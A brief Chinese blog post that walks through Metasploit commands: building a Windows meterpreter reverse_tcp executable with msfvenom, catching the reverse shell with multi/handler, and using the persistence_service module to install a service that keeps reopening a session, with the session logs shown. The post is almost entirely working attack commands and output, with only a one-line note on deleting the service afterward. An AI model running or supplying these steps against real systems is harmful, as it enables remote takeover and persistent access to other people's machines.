exploit/windows/local/persistence_service

2022-07-22 16:02:42 浏览数 (3)

代码语言:javascript复制
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.18.13.90 lport=9999 -f exe > 123.exe

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 172.18.13.90
set lport 9999
exploit -j
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                 Connection
  --  ----  ----                     -----------                                 ----------
  1         meterpreter x64/windows  WIN-4G15PAGR5I1Administrator @ WIN-4G15PA  172.18.13.90:9999 -> 172.18.13.145:57866 (
                                     GR5I1                                       172.18.13.145)
use exploit/windows/local/persistence_service
set session 1
run

[*] Started reverse TCP handler on 172.18.13.90:4444
[*] Running module against WIN-4G15PAGR5I1
[ ] Meterpreter service exe written to C:UsersADMINI~1AppDataLocalTemp2bknnobA.exe
[*] Creating service SsmCe
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/WIN-4G15PAGR5I1_20220722.4531/WIN-4G15PAGR5I1_20220722.4531.rc
[*] Sending stage (175174 bytes) to 172.18.13.145
[*] Meterpreter session 7 opened (172.18.13.90:4444 -> 172.18.13.145:61971) at 2022-07-22 14:45:33  0800


卸载 服务:sc delete 【服务名称】

0 人点赞